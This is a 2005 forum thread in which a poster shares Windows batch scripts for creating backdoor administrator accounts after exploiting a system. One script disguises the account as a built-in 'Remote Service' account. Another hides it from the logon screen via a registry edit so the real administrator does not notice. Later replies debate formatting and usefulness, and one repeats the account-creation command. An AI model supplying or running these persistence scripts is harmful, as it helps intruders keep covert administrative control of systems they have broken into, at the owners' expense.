RemoteConnection 0 Report post Posted August 3, 2005 when u have an access to a windows system by CMD , maybe u need to create an admin account with a remote cnnection,here's the way: @echo offnet user IUSR_WAN /add /expires:nevernet localgroup administrators /add IUSR_REMOTEnet user IUSR_WAN hermannet user IUSR_WAN /comment:"Built-in account for Remote Service"net user IUSR_WAN /fullname:"Remote Service Account" also another way that the user won't show on login screen!@echo offnet user illwill password /add && net localgroup administrators illwill /addecho Windows Registry Editor Version 5.00> c:\hide.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.regecho "illwill"=dword:00000000>> c:\hide.regREGEDIT /S c:\hide.REGDEL /Q c:\hide.REGExit Share this post Link to post Share on other sites
BuffaloHelp 24 Report post Posted August 3, 2005 Looks like you need to create this in a batch file. Is that right? If so, you MUST explain the full process of saving to what file type. If this is the commands you need to type on the prompt, use the CONSOLE code. Don't forget to refer to the BB Code Help link during your post. Thank you. Share this post Link to post Share on other sites
RemoteConnection 0 Report post Posted August 3, 2005 yea , that's right , a batch file , u know i just tried to explain it for a medium level user, but if it's needed to explain more , Sure Share this post Link to post Share on other sites
Saint_Michael 3 Report post Posted August 3, 2005 hmmm that shounds like a admin backdoor to a computer networking system hmm intriguing. but yeah its look lieky our missing something from it though. Share this post Link to post Share on other sites
BuffaloHelp 24 Report post Posted August 3, 2005 It's Xisto's posting rules to give full examples. It's also common courtesy to respect all levels of understandings in this forum. Let's not presume that everyone has the same technical background as you are. Share this post Link to post Share on other sites
RemoteConnection 0 Report post Posted August 3, 2005 well, u know Saint_Michael if you have access to a system just by cmd,like when u gained access to a system by today's exploits .... u only have command proment //// Share this post Link to post Share on other sites
mayank 2 Report post Posted August 3, 2005 i think there is no use of this trick....because then you'll need the admin rights to create any account like this...and secondly if you have admin rights then you you dont need this trick Share this post Link to post Share on other sites
RemoteConnection 0 Report post Posted August 3, 2005 well mayank , i'll give u an example , u have gained access to a system by exploit and it gave u the admin rights ... but u wanna create another admin account that u don't want to show on logon screen becase of the primary administrator /// ait? Share this post Link to post Share on other sites
iGuest 3 Report post Posted May 12, 2009 Make Admin userCreating Hidden UserTry: net user "yourname" "yourpassword" /add In CMD -reply by SchoolHacker Share this post Link to post Share on other sites